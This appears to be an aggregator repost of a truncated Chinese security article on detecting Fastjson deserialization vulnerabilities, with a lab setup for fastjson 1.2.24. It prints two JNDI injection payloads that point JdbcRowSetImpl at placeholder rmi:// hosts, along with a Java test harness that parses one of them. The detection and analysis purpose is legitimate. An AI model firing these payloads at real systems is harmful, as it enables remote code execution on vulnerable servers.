注册    登录
看啥推荐读物
专栏名称: Yaklang
Yak Language Project: <del>北半球</del>最强安全研发语言 / 黑客语言
我也要提交微信公众号
今天看啥
微信公众号rss订阅, 微信rss, 稳定的RSS源
目录
相关文章推荐
今天看啥  ›  专栏  ›  Yaklang

FastJson 启发式检测

Yaklang  · 公众号  ·  · 2022-05-27 17:43
Fastjson payload有很多版本,有些检测工具简单粗暴的将所有payload打了一遍,效率很低,本篇文章意在找出适用范围最广的payload,高效的完成漏洞检测下面是两个最通用的payload{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"rmi://x.x.x.x:1098/jndi", "autoCommit":true}{"x":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1/aaa","autoCommit":true}}fastjson漏洞分析环境搭建首先创建一个maven项目,pom.xml中加入fastjson依赖 com.alibaba fastjson 1.2.24 测试代码如下import com.alibaba.fastjson.JSONObject;public class fastjsonTest { public static void main(String[] args){ String payload = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://x.x.x.x:1099/jndi\", \"autoCommit\":true}"; JSONObject.parse(payload); }}调试跟踪第一 ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
推荐文章
老子道德经  ·  真正高贵的女人,三不贪两不乱
2 月前
君临财富  ·  常见问题解答
2 年前
光电与显示  ·  19.6亿出售和谐芯光100%股权 华灿光电“断臂”自保
4 年前
程序员小灰  ·  漫画:什么是区块链?
6 年前
小城奶爸背巾侠  ·  第八十四天:再见,仰漂
7 年前
关于   移动版   ·   Py中国   ·   RSS之家   ·   codingpro   ·   Code   ·   link之家   ·   卧龙AI搜索   ·   藏经阁   ·   小百科
今天看啥 - 微信公众号rss订阅, 微信rss, 稳定的RSS源
© 2024 ~ 沪ICP备11025650号